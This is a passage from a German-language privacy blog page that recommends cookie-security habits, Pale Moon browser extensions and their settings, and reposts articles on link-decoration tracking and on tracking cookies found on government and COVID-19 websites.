verwundbar. Denken Sie daran: Jemand könnte Sie online beobachten - und nicht nur wegen Ihres guten Geschmackes beim Online-Shopping. Sichere Online-Interaktionen gewährleisten 1. Nutzen Sie sichere Netzwerkverbindungen Öffentliches Wi-Fi ist verlockend, aber auch ein Einfallstor für Hacker. Cafés, Flughäfen und Hotels bieten oft ungesicherte Verbindungen, was Hacker anzieht, die auf Lauschangriffe spezialisiert sind. Bei sensiblen Online-Aktivitäten empfiehlt sich ein virtuelles privates Netzwerk (VPN), das Ihren Internetverkehr verschlüsselt und Sie vor neugierigen Blicken schützt. Stellen Sie sich ein VPN als unsichtbaren Schutzwall vor - eine smarte, diskrete Barriere gegen Cookie-schnappende Angreifer. 2. HTTPS-Protokolle durchsetzen Websites, die noch das unsichere HTTP-Protokoll nutzen, machen sich zur leichten Beute. HTTPS hingegen umschließt Ihre Daten mit einer Schutzschicht, die es Angreifern erheblich erschwert, Informationen abzufangen. Wenn eine Website, die Sie verwenden, noch nicht auf HTTPS umgestiegen ist, sollten Sie deren Engagement für Ihre Sicherheit hinterfragen. Entwickler sollten sicherstellen, dass HTTPS ein Muss ist - so wie man beim Verlassen des Hauses die Tür abschließt. 3. Halten Sie die Software auf dem neuesten Stand Veraltete Software lädt Hacker ein, da Sicherheitslücken oft erst durch Updates geschlossen werden. Ob Browser oder Plug-ins - bei Software-Updates geht es oft weniger um neue Funktionen als um die Beseitigung von Schwachstellen. Jedes Update hilft, potenzielle Einfallstore für Angreifer zu versperren. Da Hacker unerbittlich nach Schwachstellen suchen, ist es ratsam, stets die neuesten Sicherheits-Updates zu installieren. 4. Achten Sie auf ordnungsgemäße Sitzungsverwaltung Das Abmelden nach einer Sitzung mag trivial erscheinen, ist jedoch ein wichtiger Schutzmechanismus. Durch das Abmelden wird das Sitzungs-Cookie ungültig und damit wertlos für Dritte. Besonders auf gemeinsam genutzten oder öffentlichen Computern ist das Abmelden unerlässlich - wie das Abschließen der Autotür beim Parken mit laufendem Motor. 5. Privates Surfen verwenden Beim Surfen auf gemeinsam genutzten Computern ist der Inkognito- oder private Modus eine gute Option. Er schützt zwar nicht vollständig, verhindert jedoch die Speicherung von Sitzungscookies und des Browserverlaufs. Sobald das private Fenster geschlossen wird, verschwinden die meisten Spuren Ihrer Sitzung. Das Risiko, sensible Cookies zurückzulassen, die von anderen ausgenutzt werden könnten, lässt sich so deutlich minimieren. 6. Cookies regelmäßig verwalten Cookies altern lassen ist wie Milch offen stehen zu lassen - sie können im falschen Moment verderben. Regelmäßiges Löschen oder das schnelle Auslaufenlassen von Cookies sorgt dafür, dass keine veralteten Cookies herumliegen, die zum Angriffsziel werden könnten. Browser-Erweiterungen zur Cookie-Verwaltung bieten eine zusätzliche Schutzebene. Betrachten Sie dies als digitalen Hausputz: Niemand möchte anfällige, alte Cookies herumliegen lassen. 7. Vorsicht bei Browser-Erweiterungen Browser-Erweiterungen sind nützlich, verlangen jedoch oft umfassende Berechtigungen, die ihnen Zugriff auf Cookies und Browsing-Daten geben können. Installieren Sie daher nur Erweiterungen aus vertrauenswürdigen Quellen und überprüfen Sie die Berechtigungen. Denken Sie daran: Lassen Sie sie nur rein, wenn Sie sicher sind, dass sie Ihre Privatsphäre nicht missbrauchen. 8. Zwei-Faktor-Authentifizierung (2FA) verwenden 2FA fügt eine zusätzliche Sicherheitsebene hinzu, indem sie eine zweite Verifizierung verlangt, wie einen Code auf Ihr Telefon. Selbst wenn ein Angreifer Ihren Cookie abfangen sollte, fehlt ihm der zweite Authentifizierungsfaktor. So ist es, als bräuchte er nicht nur den Schlüssel, sondern auch den Zugangscode - Cookie-Hijacker schaffen es vielleicht bis zur Eingangstür, aber 2FA lässt sie nicht weiter. Die entscheidende Rolle der Entwickler Benutzer können viel tun, doch echter Schutz beginnt auf Code-Ebene. Entwickler sind in der Verantwortung, Anwendungen sicher zu gestalten und die Sitzungen der Nutzer abzusichern. Sichere Kodierungspraktiken: Setzen Sie HttpOnly- und Secure-Flags bei Cookies, um sie vor JavaScript und ungesicherter Übertragung zu schützen. Nutzeraufklärung: Viele Nutzer sind sich der digitalen Bedrohungen nicht bewusst. Entwickler können durch Erinnerungen und Warnungen in der Anwendung Aufklärung betreiben, z. B. für die Nutzung sicherer Geräte. XSS-Schutz: XSS-Angriffe ermöglichen es Hackern, bösartigen Code einzuschleusen, um Daten abzufangen. Entwickler sollten XSS-Schutz einbauen und Cookies auf Code-Ebene absichern. Da unser digitaler Fußabdruck wächst, muss auch unser Engagement für die Sicherheit zunehmen. Die Cookie-Sicherheit ist nur ein Teil des Puzzles, aber ohne sie bleibt der Schutz unvollständig. In einer Welt, in der Daten eine Währung sind und Privatsphäre wertvoll ist, geht es beim Cookie-Schutz um mehr als nur sicheres Surfen - es geht um den Schutz unserer digitalen Identität. Quelle: Don´t Let a Cookie Steal Your Online Identity: Simple Steps to Stay Secure, https://reclaimthenet.org/dont-let-a-cookie-steal-your-online-identity-simple-steps-to-stay-secure https://uncutnews.ch/lassen-sie-nicht-zu-dass-ein-cookie-ihre-online-identitaet-stiehlt-einfache-schritte-fuer-mehr-sicherheit/ Empfohlene Installationsreihenfolge der Pale Moon Erweiterungen für Sicherheit: 1 Block Content Download vor 2 PermissionPlus, 3 ScriptBlocker, 4 ABL, 5 Request Policy Block Continued, 6 nMatrix, 7 noscript und Torwart/Goalkeeper 8 Privacy Badger. Firefox Addons Firefox Multi-Account Containers Version 8.0.6, CHIP, 21.02.2022 Trennung von Privatem und Geschäftlichem Mehr Privatsphäre beim Surfen Umfangreiche Anpassungsmöglichkeiten Mit dem kostenlosen Firefox Add-on "Multi-Account Containers" trennen Sie beim Surfen verschiedene Bereiche wie Online-Banking, Arbeit oder privates Surfen technisch voneinander, indem Sie Container festlegen und Webseiten passend einordnen. In einem Tab checkt man die geschäftlichen E-Mails, in einem anderen ist der private Facebook-Account offen und im Dritten erledigt man Online-Banking: "Multi-Account Containers für Firefox" will diese verschiedenen Arbeitsbereiche innerhalb eines Browserfensters trennen und dadurch Ihre Privatsphäre stärker schützen. Multi-Account Containers für Firefox: Ein Browserfenster, mehrere Accounts [...] So können Sie beispielsweise Ihren Social-Media-Account geöffnet lassen, ohne das Facebook und Co. alles über Ihr restliches Surfverhalten mitbekommen. https://www.chip.de/downloads/Firefox-Multi-Account-Containers_133326187.html Gooken empfiehlt den sagenhaften Pale Moon (palemoon.org, pclos)! Der Firefox im Codeumfang beschneidende, daher auch sicherheitstechnisch härtende und trotzdem komfortable Pale Moon mit TLS-1.3-Support läuft auch unter minimalen Systemanforderungen: Pale Moon ist für fast alle Systeme erhältlich! Pale Moon bietet die Auswahl von drei bekannten internen Engines: Firefox-Quantum, Mozilla-Gecko (empfohlen) oder interne Engine. Viele neue und alte Firefox-Erweiterungen lassen sich mühelos integrieren, darunter Request Policy Block Continued, ABL ( von palemoon.org, bekannt unter AdBlockPlus (ABP)) und Noscript, hinzu kommt nMatrix (von palemoon.org) usw.! Pale Moon Wichtiges nss-update Ende November 2021: nss: Sogar libnss3.so und libnssutils3.so aus /usr/lib64 können mit nss (el8, el7) und nss-utils (el8, el7) mittels Kopierbefehl "cp -fp" bzw. Link-Befehl "ln" mühelos ausgetauscht (aktualisiert) werden! Can I run Firefox extensions in Pale Moon? Yes, you can, for now. Since version 25 we´ve had the option to install (now called "legacy") XUL, bootstrapped and Jetpack type Firefox extensions on Pale Moon, despite Pale Moon being (and being identified as) a different browser. Please understand though that there is no guarantee that these extensions will work, and using extensions targeted at a different application is entirely at your own risk and you are pretty much on your own regarding support. https://forum.palemoon.org/viewtopic.php?f=46&t=23697 [ SOLVED by palemoon.org: Nächstes Problem "Pale Moon does´t start: XPCOM-error" wurde in Pale Moon > 29.4.1 vom 17.09.2021 gelöst, aber erneut wieder in Pale Moon >= 29.4.2.1 ( < 29.4.3, the version, where it got solved )!, remark Gooken) ] Lieber Leser, bitte verständigen sie den Entwickler von Pale Moon! Wir können ihn nicht mehr erreichen! Email sent by Gooken to: moonchild.prod@palemoon.org, redaktion@chip.de Date: 08.27.2021 Please forward this e-mail to the Pale Moon - forum and -developers ! Hello, here´s Gooken, and we want to tell you, that Pale Moon Version 29.4.0 does not start anymore! Started in a terminal, belonging error-message occurs: "XPCOMGlueLoad error for file /usr/lib64/palemoon/libxul.so: /usr/lib64/palemoon/libxul.so: undefined symbol: g_bytes_unref Couldn´t load XPCOM." Our GTK version is 2.24 (gtk from Enterprise Linux 6). All previous versions up to 29.3.0 did work fine. It would be nice to patch it (of course we can try another GTK version, if not)! Regards, Palemoon up to now (24.4.4) still has got the sometimes arrow jumping toolbar icon during the load of some webpages. It would be nice to patch it too. PROBLEM: Pale Moon 30.0.0: Menüs lassen sich meist nicht mehr öffnen, keine Eingabe in Adresszeile möglich, Pale Moon surft nicht ! Wir verwenden daher weiterhin Pale Moon 29.4.4, nun 29.4.5.1 Regards, Gooken An answer followed few days later by Top news from Pale Moon Org, https://www.palemoon.org, 21 march 2022 "Pale Moon 30 rollout cancelled. Following severe issues with the unexpected exit of a core dev and considerable damage caused to our operations, the milestone 30 rollout has been cancelled. Dabei geht der am Schluss installierte ("Torhüter, Torwart") Privacy Badger von der Bürgerrechtsorganisation EFF selbst nach vorgesehenen Blocken aller Trackingskripte mit dem Schieberegler von grün auf überalll rot, ausgenommen Facebook-Widgets, (hoffentlich) meist leer aus: Aufgelistete, vor ihm installierte Erweiterungen nehmen ihm diese Arbeit bereits ab. privacybadger.org: [...] Although we like Disconnect, Adblock Plus, Ghostery and similar products, none of them are exactly what we were looking for. In our testing, all of them required some custom configuration to block non-consensual trackers. Several of these extensions have business models that we weren´t entirely comfortable with. And EFF hopes that by developing rigorous algorithmic and policy methods for detecting and preventing non-consensual tracking, we´ll produce a codebase that could in fact be adopted by those other extensions, or by mainstream browsers, to give users maximal control over who does and doesn´t get to know what they do online." How does Privacy Badger work? When you view a webpage, that page will often be made up of content from many different sources. (For example, a news webpage might load the actual article from the news company, ads from an ad company, and the comments section from a different company that´s been contracted out to provide that service.) Privacy Badger keeps track of all of this. If as you browse the web, the same source seems to be tracking your browser across different websites, then Privacy Badger springs into action, telling your browser not to load any more content from that source. And when your browser stops loading content from a source, that source can no longer track you. Voila! At a more technical level, Privacy Badger keeps note of the "third party" domains that embed images, scripts and advertising in the pages you visit. Privacy Badger looks for tracking techniques like uniquely identifying cookies, local storage "supercookies," first to third party cookie sharing via image pixels, and canvas fingerprinting. If it observes a single third-party host tracking you on three separate sites, Privacy Badger will automatically disallow content from that third-party tracker. In some cases a third-party domain provides some important aspect of a page´s functionality, such as embedded maps, images, or stylesheets. In those cases Privacy Badger will allow connections to the third party but will screen out its tracking cookies and referrers (these hosts have their sliders set to the middle, "cookie block" position). https://privacybadger.org/#What-is-Privacy-Badger Pale Moon security extension Privacy Badger Electronic Frontier Foundation USA: Erneut Klage gegen Massenüberwachung durch NSA abgewiesen, netzpolitik.org, 11.05.2019 Seit Jahren kämpft die Electronic Frontier Foundation ( ff-Erweiterung Privacy Badger u.a.) vor Gerichten gegen die Massenüberwachung durch den US-Geheimdienst NSA. Nun hat ein Bundesrichter eine Klage aus dem Jahr 2008 abgewiesen: Um die nationale Sicherheit zu schützen, müsse ein mögliches Überwachungsprogramm geheim bleiben. https://netzpolitik.org/2019/usa-erneut-klage-gegen-massenueberwachung-durch-nsa-abgewiesen/ Palemoon-Sicherheits-Erweiterung nMatrix Füge im Dashboard n-Matrix folgende Regeln von temporär zu permanent hinzu: https-strict: * true https-strict: behind-the-scene false matrix-off: about-scheme true matrix-off: chrome-extension-scheme true matrix-off: chrome-scheme true matrix-off: moz-extension-scheme true matrix-off: opera-scheme true matrix-off: wyciwyg-scheme true no-workers: * true referrer-spoof: * true referrer-spoof: behind-the-scene false * * * block * * css block * * frame block * * image block * * script block * * xhr block * * media block * * other block * 1st-party css allow * 1st-party image allow afterdawn.dk www.afterdawn.dk script block ... Allein der Image-Block schützt vor Webbugs. Beachte, dass sämtliche Werte per einfachem Mausklick auch direkt innerhalb der Matrix gesetzt werden können, auch mit Klick auf die Spalten- und Zeilen-Zusammenfassungen ihres Randes! Pale Moon - Erweiterung (-Extension): Certificate Patrol "Welcome to Certificate Patrol 2.0. We introduced some improvements, that we should first explain to you. Before we even list the details of a certificate, we first show you the certification hierarchy. That is the most important clue for oyou to find out, if you´re being tricked. An intermediate authority can put any text in the certificate, that you would like to see, but it cannot falsify the certificate checksums and its position in the hierarchy. Dangerous certificates are likely to be generated by a long list of authorities belonging to different companies or governments. Genuine ones are likely to be signed directly by a root certificate in your browser or by an intermediate creaated by the same company. All the inbetween cases are likely to be legitimate, but you can´t be sure. We are still taking guesses hsere because we steill don´t know, which root certificates in our browsers are worthy of trust. By keeping your eyes open and observing the patterns, you are a lot likelier to notice, when you are being attacked. In case of doubt, compare (by telephone) the checksums with somebody, that could not possibly be affected. Another important change is, that we now inspect certificates for all parts of webpage, so you may see server names and domains comping up, that you never thourght youwere visiting, just because they host some Javascript or media files. It´s also new, that you can reject all new certificate, when you see them. That doesn´t mean, that you will be protected from using them, because we don´t have that much control over your browser. If you don´t trust a site, you still have to close the window yourself. But it maens, that, if you bump into the same certificate again, you will be asked again. You could use this to see, if a certain website always has the same certificate, when you change internet connection. (like open it from work, then from home). Then again, if you store the certificate, you´re even safer, that the certificate is the same. Several websites hat the bad habit of using multiple certificates for the same hostname. We consider it a configuration error on their side, but since they insist, you now have a little option of the certificate change pop-up to accept any certificate for the host as long as the issuer, that is the next higher level authority, stays the same. This should help in most cases, although I bet there are some, which are more misconfigured than that." Initialisierung der wohl wichtigsten Palemoon-Sicherheits-Erweiterung "Block Content Download" (msdy) jedesmal beim Neustart: Gebe about::config in der Adresszeile ein oder editiere /home/user/.mozilla/userprofile/user.js, indem alle Einträ,ge permissions.*.* i.a. auf den Wert 3 für Bilder (darunter Webbugs ( Trackingskripte mit Bildern als Endausgabe ) ), Stylesheets, Objekte, Skripte, Subdocuments (Dokumente) usw., d.h. zumindest auf "Nicht von Drittanbietern" gesetzt werden. Initialization of the Pale Moon security extension "Block Content Download" each new start: in about::config edit /home/user/.mozilla/userprofile/user.js,by changing values of all items like permissions.*.* to the value 3, 3 for images, stylesheets, objects, Scripts, subdocuments and so on, that at least means "No thrid party allowed" ! Pale Moon security extension: nMatrix Point&click to forbid/allow any class of requests made by your browser. Use it to block scripts, iframes, ads, facebook etc. nMatrix does also Delete blocked cookies Delete non-blocked session cookies minutes after the last time they have been used Delete local storage content set by blocked hostnames Clear browser cache every minutes Spoof HTTP referrer string of third-party requests Strict HTTPS: forbid mixed content Block all hyperlink auditing attempts Resolve CNAME records Pale Moon Extension: Pure URL 3.3.2 strips garbage referer tracking fields like ´utm_source´ from links and resolves short links Vorsicht bei diesen Links!, uncut-news.ch, 27.10.2023 Werbetreibende finden immer neue Wege, um Menschen zu verfolgen. Die digitale Werbeindustrie gibt keineswegs auf, so viele Daten wie möglich über Internetnutzer zu sammeln, nur weil die Cookies von Drittanbietern abgeschafft werden. Informieren Sie sich: Verstehen Sie, was Link-Dekoration ist und wie sie verwendet wird, um das Nutzerverhalten online zu verfolgen. Machen Sie sich mit den gängigen Link-Dekorationsparametern wie utm_source, utm_medium, utm_campaign usw. vertraut, die häufig für Marketinganalysen verwendet werden. Untersuchen Sie Links: Bevor Sie auf einen Link klicken, bewegen Sie den Mauszeiger über den Link, um die vollständige URL zu sehen. Achten Sie auf zusätzliche Parameter, die an die URL angehängt sind, insbesondere nach einem Fragezeichen (?). Verwenden Sie Tools zur Überprüfung von Links: Verwenden Sie Tools oder Browser-Erweiterungen, die Links für Sie analysieren können. Einige Erweiterungen können Tracking-Parameter automatisch aus URLs entfernen. Manuelle Bereinigung: Wenn Sie dekorierte Links bemerken, können Sie die zusätzlichen Parameter manuell entfernen, indem Sie alles nach dem Fragezeichen (?) löschen und sicherstellen, dass die Haupt-URL intakt bleibt. Ändern Sie beispielsweise https://example.com/page?utm_source=facebook in https://example.com/page. Verwenden Sie datenschutzfreundliche Browser und Erweiterungen: Erwägen Sie die Verwendung von Browsern mit integrierten Funktionen zur Verwaltung von Link-Dekorationen. Installieren Sie Browser-Erweiterungen, die Ihnen helfen, Tracking-Parameter zu entfernen oder Tracker zu blockieren. Verbreiten Sie das Bewusstsein: Teilen Sie Ihr Wissen über Link-Dekoration mit Freunden und Familie. Ermutigen Sie sie, ähnliche Praktiken anzuwenden, um ihre Online-Privatsphäre zu schützen. Bleiben Sie auf dem Laufenden: Informieren Sie sich über die neuesten Entwicklungen im Bereich Online-Tracking und Datenschutz. Aktualisieren Sie regelmäßig Ihren Browser und Ihre Datenschutztools, um sicherzustellen, dass Sie über die neuesten Schutzmaßnahmen verfügen. Üben Sie sicheres Surfen: Seien Sie vorsichtig, wenn Sie auf Links in E-Mails, sozialen Netzwerken oder anderen Plattformen klicken. Wenn ein Link verdächtig aussieht oder von einer unbekannten Quelle stammt, klicken Sie nicht darauf. Legen Sie Lesezeichen für vertrauenswürdige Websites an: Das Setzen von Lesezeichen für Websites, die Sie häufig besuchen, kann dazu beitragen, ein potenzielles Tracking durch Linkdekoration von zwischengeschalteten Quellen zu vermeiden. Verwenden Sie datenschutzfreundliche Suchmaschinen: Erwägen Sie die Verwendung von Suchmaschinen, die Ihren Suchverlauf nicht nachverfolgen und keine Informationen an Dritte weitergeben. Wenn Sie diese Schritte befolgen, können Sie die mit der Verlinkung verbundenen Risiken erheblich minimieren und die Kontrolle über Ihren digitalen Fußabdruck übernehmen. Mit der Zeit werden diese Praktiken zur Selbstverständlichkeit und tragen zu einer sichereren Online-Erfahrung bei. Quelle: https://reclaimthenet.org/beware-of-these-links https://uncutnews.ch/vorsicht-bei-diesen-links/ Pale Moon Sicherheits-Erweiterung: Secret Agent zum Setzen der Useragent-Kennung des Browsers Der zum Setzen der Browser-Kennung zuständige SecretAgent lässt kaum noch Wünsche offen, vermag Browserkennungen unter Einrichtung von Ausnahmen frei zu setzen und zu rotieren, Blockade von Hijacking, Anonymisiserung des Referers usw., wird aber nicht als OpenSouce von palemoon.org, sondern als Closed Source nur original von Herstellerseite aus Großbritannien angeboten. Pale Moon Sicherheits-Erweiterung: Eclipsed Moon: Open-Source Useragent-Kennung-Setzung im Browser (Alternative von SecretAgent, Eclipsed Moon gab z.B. auf Webseitene wie https://slackware.pkgs.org/14.2/ den ursprünglichen Original-UserAgent zurück, während SecretAgent den UserAgent tatsächlich auswechselt ! Eclipsed Moon verhält sich ganz ähnlich wie SecretAgent, verfügt aber über keine Ausnahme-Liste, dafür über eine frei vornehmbare Anonymisierung der Einstellungen in "about:config" - alles per einfachen Mausklicks. Orgingaltext: By: Eurythrace Perseides About this add-on This add-on/extension is designed to work unobtrusively by using current, well known user agent strings and operating systems to "blend in" with the crowd. The preferred "smart" mode is designed to switch the user agent string only when no external tabs are open except for the home page, if it is an external page. The intent is to be quiet and NOT draw attention by changing the user agent string too frequently or using unique ones. It also offers an anonymity checklist for the browser settings, and has a "smart erase" feature to forget about a site when all open tabs to that site are closed. This is a COMPLETE erasure for that individual site, similar to the Delete History option when closing the browser. ALL PASSWORDS, COOKIES, HISTORY, ETC. WILL BE ERASED FOR THE SITE! Test Package A test package to verify the operation of the random User Agent generation may be downloaded from here: https://addons.palemoon.org/datastore/addon/eclipsedmoon/eclipsedmoon-test.zip Once unzipped, the XHTML file should be opened in a Pale Moon™ browser that already has the Eclipsed Moon add-on/extension installed. The operating mode of the add-on/extension should be set to "Page" before loading the test XHTML page. The test will then proceed to iterate a default value of 50 times and collect the statistics of the User Agents used for each iteration. Optionally, an iteration count may be passed to the XHTML file via adding a query string to the URI in the form of "?runs=100". The maximum number of iterations is set to 1000, although the JavaScript file associated with the XHTML file may be edited to change that number. There is an optional PHP file that may be loaded on a server along with the supporting files so the test may be conducted over the internet rather than on the local computer. This will use a large amount of bandwidth to run the test since each iteration will need to completely reload files from the server. The difference is that using the PHP file collects the User Agent from the HTTP header rather than the window.navigator.userAgent DOM property. https://addons.palemoon.org/addon/eclipsedmoon/ Pale Moon security extension and tool resp. utility: Config Comments Dieses security extension (Sicherheitserweiterung) aus Tools&Utilities anstelle Security von palemoon.org dient der Erklärung vieler einzelner Einträge in about:config. Weiter unten nimmt dieser Exkurs insbesonders in user.js zahlreiche Einstellungen und Änderungen in about:config vor. Daher möchten wir Ihnen auch diese Browser-Erweiterung sehr empfehlen! Pale Moon im Modus gecko (Goanna) - Start in unter 15 statt über 70 Sekunden Pale Moon Security Extension und tool bzw. Uitlity: Expire history by days Diese Sicherheitserweiterung aus Tools&Utilities anstelle Security von palemoon.org dient dem automatisierten Entleeren der History. Setzen sie Expire-in-days von 0 auf den Wert 1. Damit startet Pale Moon unseren Beobachtungen nach erheblich schneller, und ein Ausspionieren gleich zu Beginn (mit dem Start von Pale Moon) wird immer unwahrscheinlicher! Pale Moon security extension: signTextJS By: dkeeler@mozilla.com, rbarnes@mozilla.com, vbadev@gmail.com About this add-on window.crypto.signText is a digital signature technology, that has been available to Firefox users for 20 years. It is used by government and banking sites. It can be used to participate in plebiscites. The window.crypto interfaces were removed from Firefox 35 and later releases. An add-on was developed as a stop-gap measure for users; that add-on is deprecated and does not work since Firefox 57, but still work with Pale Moon. This fork based on the original signTextJS-0.7.7 add-on by mozkeeler. https://addons.palemoon.org/addon/signtextjs/ Pale Moon security extension: Modify HTTP Response By: Off JustOff About this add-on Modify HTTP Response is designed to rewrite http response body using search & replace patterns. Warning: This tool works on low level API and intended for advanced users. Incorrect filters can cause browser freeze, hang or loose data. Never use filters from untrusted sources or if you don´t understand them. https://addons.palemoon.org/addon/modify-http-response/ Pale Moon and Firefox security extension: No Resource URI Leak Deny resource:// access to web content. We fill the hole to defend against fingerprinting. Very important Firefox privacy. A direct workaround for bugzilla.la/863246: block access to resource:// URIs from web block web-exposed subset of chrome:// URIs uniformly filter disallowed redirects restrict about: pages by default (for paranoids) Classic Add-ons Archive [External] Catalog of classic Firefox add-ons created before WebExtensions apocalypse. https://addons.palemoon.org/extensions/other/ [ SOLVED by Gooken: Pale Moon (aktuelle Version: 28.12.0) hält nach jedem Start um die 30 Sekunden einfach an, so dass keinerlei Eingabe möglich ist ] Gebe about:config in die Adressleiste ein und lösche (fast) alle Einträge (URL/URI), die "http://" und "https://"enthalten! Das Design von Pale Moon gefällt Ihnen nicht? Von palemoon.org können neben der aktuellen Version und Erweiterungen viele Themes installiert werden! Pale Moon - Erweiterungen: Formuliere gegebenenfalls Ausnahmen innerhalb einer Erweiterung Ausnahmen können innerhalb der Erweiterung SecretAgent, noscript, RequestPolicy, nMatrix und der Proxy-Konfiguraiton von Pale Moon frei formuliert (gesetzt) werden. Somit bleibt nichts mehr für den Administrator wie Benutzer ( manuell ) zu tun - wie generell mit UNIX/Linux möglich! STUDIE: 99 % der COVID-Daten-Webseiten verfolgen heimlich deren Nutzer, uncut-news.ch, 15.07.2022 Geheimdienste/NSA/Überwachung/BigData Die überwiegende Mehrheit der staatlichen und COVID-19-Tracking-Websites setzt einer neuen Studie zufolge ohne Zustimmung Tracker von Drittanbietern ein. Diese Enthüllung stammt aus dem kürzlich veröffentlichten Papier "Measuring Web Cookies in Governmental Websites", das von einer Gruppe europäischer Forscher veröffentlicht wurde, die von Gruppen wie dem Europäischen Forschungsrat (ERC), der Europäischen Union und der spanischen Regierung finanziert wurden. "Ein potenzielles Risiko von E-Governance besteht darin, dass es, da es einen einzigen Interaktionspunkt für obligatorische und unverzichtbare Dienstleistungen für alle Bürger darstellt, unbeabsichtigt oder nicht, zu einem einzigen Punkt der Überwachung und Verfolgung der gesamten Bevölkerung eines Landes werden kann. Eine leicht verfügbare Möglichkeit, dies zu erreichen, ist die Verwendung von Web-Cookies", heißt es in dem Papier. In der Studie wurden drei Arten von Websites untersucht: offizielle Regierungswebsites der G20-Länder in aller Welt, Websites internationaler Organisationen wie der Vereinten Nationen und beliebte Websites, die für COVID-19-Tracking und -Informationen genutzt werden. Gemessen wurde die Verwendung von "Cookies" auf diesen Websites, d. h. von persönlichen Daten über den Browserverlauf, die von den Websites zu einem späteren Zeitpunkt abgerufen werden können. "Web-Cookies werden genutzt, um Informationen über die Online-Aktivitäten und Interessen der Nutzer zu sammeln", heißt es in dem Papier. "Unsere Ergebnisse zeigen, dass das Tracking leider ein ernsthaftes Problem darstellt, da in einigen Ländern bis zu 90 % dieser Websites Cookies von Drittanbietern ohne die Zustimmung der Nutzer erstellen", heißt es in einer Zusammenfassung der Ergebnisse. "Non-Session-Cookies, die von Trackern erstellt werden und Tage oder Monate lang bleiben können, sind selbst in Ländern mit strengen Datenschutzgesetzen weit verbreitet. Wir zeigen auch, dass dies ein Problem für offizielle Websites internationaler Organisationen und beliebte Websites ist, die die Öffentlichkeit über die COVID-19-Pandemie informieren", heißt es weiter. Die Forscher fanden heraus, dass bis zu 90 Prozent der Regierungswebseiten der "G20"-Länder, zu denen 19 Länder und die Europäische Union gehören, die die größten Volkswirtschaften der Welt bilden, Tracking-Cookies ohne Zustimmung der Nutzer hinzugefügt haben. G20 Website Cookie Use. "Mehr als 50 % der Cookies auf den Websites der G20-Regierungen stammen von Dritten, und mindestens 10 % (bis zu 90 %) stammen von bekannten Trackern. Die meisten dieser Cookies haben eine Lebensdauer von mehr als einem Tag und viele eine Verfallszeit von einem Jahr oder mehr", heißt es in der Studie weiter, die auf der Grundlage von 5.500 Regierungswebsites und über 118.000 von Regierungen verwalteten URLs durchgeführt wurde. Rund 95 Prozent der untersuchten internationalen Organisationen haben Cookies ohne Zustimmung der Nutzer erstellt, und etwa 60 Prozent haben mindestens ein Drittanbieter-Cookie verwendet. Cookies von Drittanbietern sind "dafür bekannt, dass sie Nutzer zu Datenerfassungszwecken verfolgen", erklären die Forscher. In ähnlicher Weise fügten 99 Prozent der COVID-19-Informationsseiten mindestens ein Cookie ohne Zustimmung der Nutzer hinzu. "Zum Beispiel fügte die sehr beliebte Website mit globalen Karten über die COVID-19-Fälle, die von der Johns Hopkins University unterhalten wird, Cookies von 7 Trackern hinzu", erklärt das Papier. "Alle anderen Top-10-Websites sind offizielle nationale Informationswebsites in europäischen Ländern, die drei Tracker oder mehr haben. Die amerikanischen Centers for Disease Control and Prevention (CDC) sind ebenfalls unter den Top 10, mit Cookies, die mit drei Trackern verbunden sind", heißt es weiter. Die Ergebnisse kommen inmitten von Befürchtungen, dass Regierungen im Westen versuchen, das "Social Credit Score"-System der Kommunistischen Partei Chinas nachzuahmen, das dem Regime die Möglichkeit gibt, die Ausgabengewohnheiten und Bewegungen von Einzelpersonen zu diktieren, möglicherweise auf der Grundlage ihrer Ideologien. Quelle: STUDY: 99% Of COVID-19 Data Websites Secretly Track Users. https://uncutnews.ch/studie-99-der-covid-daten-webseiten-verfolgen-heimlich-deren-nutzer/ Die Erweiterungen restriktrieren zu viel und der Weg zurück bleibt versperrt? Erzeuge ü,ber about:profiles ein weiteres (zusätzliches) Profil ohne viele bzw. ohne alle Browser-Erweiterungen, um die von Erweiterungen verantwortlichen ausgehenden Restriktionen im Bedarfsfall komplett auf einmal wieder rückgänig zu machen, für den Fall, dass man nicht mehr wei&szig;, was für die Aufhebung gewisser Restriktionen alles zu tun ist. In diesem Fall ist nach der Erzeugung des Profils in about:profiles der Browser oder nur ein Fenster des Browsers mit diesem neuen Profil ohne gewisse oder ganz ohne Erweiterungen mittels Druck auf "launch profile" zu starten! Nervige Cookie-Banner blocken: Browser-Add-on sorgt für weniger Frust beim Surfen, CHIP, 09.10.2020 Nach einem Urteil des Europäischen Gerichtshofs nerven die DSGVO-Cookie-Banner auf fast jeder Seite. Doch das kleine Browser-Tool "I don´t care about cookies" kann hier Abhilfe schaffen. Cookie-Banner müssen seit einiger Zeit noch größer und noch prominenter angezeigt werden. Vor dem Benutzen einer Seite müssen Sie nun immer erst eine Entscheidung fällen, welche Cookies eingesetzt werden dürfen, und diese Optionen dementsprechend bestätigen. Auch wenn dahinter ein guter Gedanke steckt, wird das Urteil das Surfen wohl noch komplizierter machen - doch es gibt ein Tool, das Ihnen beim Bewältigen der Bannerflut helfen kann. Download Firefox-Erweiterung: I don´t care about cookies für Firefox 3.2.2 CHIP Bewertung: Gut https://www.chip.de/news/Nervige-Cookie-Banner-blockieren-beim-Surfen-so-gehts_148087234.html Design und Styles: Für Palemoon sind viele alternative Designs und Styles von palemoon.org und anderen Stellen erhältich. Wir fassen Pale Moon zusammen: Mit Pale Moon werden Sie erstmals alle Sorgen mit Browsern los: Schon die Installation des OpenSource-Produkts ist sehr einfach. Hier gilt es lediglich, das umfassende ZIP-Archiv zu entpacken. Der Code von Pale Moon zur Erlangung von im Unterschied zu Firefox erheblich mehr Sicherheit ist wie gesagt denkbar knapp gehalten worden, schnörkellos auch im Teil "about:config". Seine gleich drei Engines Gecko, Quantum und die interne-Pale-Moon-Haus-Engine (von uns empfohlen: Gecko) sind frei wählbar. Pale Moon läuft auf so gut wie allen, auch älteren Windows-Versionen und Linux-Distributionen und Prozessoren! Im Intenet bekommt er fast alles hin. Zahlreiche Designs (Styles) lassen kaum noch Wünsche übrig! Viele neue wie alte Firefox-Erweiterungen lassen sich mühelos integrieren, ein Update auf eine stets aktuelle Version erfolgt auf pclos (als rpm) und palemoon.org (ZIP-Archiv) bislang mindestens einmal im Monat. tor (el6, rosa2016.1, Tor: The Onion Router) uMatrix (uM, https://github.com/gorhill/uMatrix/releases/download/1.4.1b6/uMatrix_1.4.1b6.firefox.signed.xpi) oder seamonkey-noscript (5.1.9 für FirefoxESR-52.9.0 von Februar 2020, enthält das xpi-installations-file) oder mozilla-noscript (5.1.8.6, 5.1.8.5, 5.1.7-1, fc, el7, el6, fr2.rpmfind.net oder mozilla.org oder 